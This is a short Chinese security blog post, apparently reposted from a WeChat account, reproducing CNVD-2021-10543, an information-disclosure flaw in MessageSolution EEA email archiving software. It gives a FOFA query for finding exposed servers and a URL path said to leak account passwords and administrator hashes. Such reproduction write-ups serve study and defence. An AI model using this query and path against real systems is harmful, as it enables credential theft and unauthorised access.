【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

  • A+
所属分类:安全文章

0x01 前言

MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。


【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现


0x02 漏洞影响


MessageSolution 企业邮件归档管理系统EEA


0x03 漏洞复现

FOFA语句

title="MessageSolution Enterprise Email Archiving (EEA)"

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

PAYLOAD:

http://ip/authenticationserverservlet/

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

直接访问如下,会看到泄露的账号密码

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现


利用泄露的账号密码登录系统

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

验证脚本

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

0x04 参考链接

https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

往期文章有彩蛋哦【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现


本文始发于微信公众号(洞见网安):【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: